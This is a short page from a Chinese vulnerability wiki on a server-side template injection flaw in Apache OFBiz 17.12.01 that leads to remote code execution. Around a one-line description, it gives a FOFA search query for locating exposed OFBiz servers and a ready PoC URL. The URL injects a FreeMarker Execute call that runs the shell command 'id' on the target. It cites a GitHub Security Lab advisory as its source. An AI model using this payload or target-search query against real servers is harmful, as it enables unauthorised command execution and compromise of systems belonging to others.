menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Apache OfBiz 远程代码执行(RCE).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Apache OfBiz 远程代码执行(RCE).md
    423 B / 2021-05-21 09:14:38
        # Apache OfBiz 远程代码执行(RCE)

Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。

FOFA:

```
app="Apache_OFBiz"
```

PoC:

```
https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}<FOO
```

from:https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz
    links
    file_download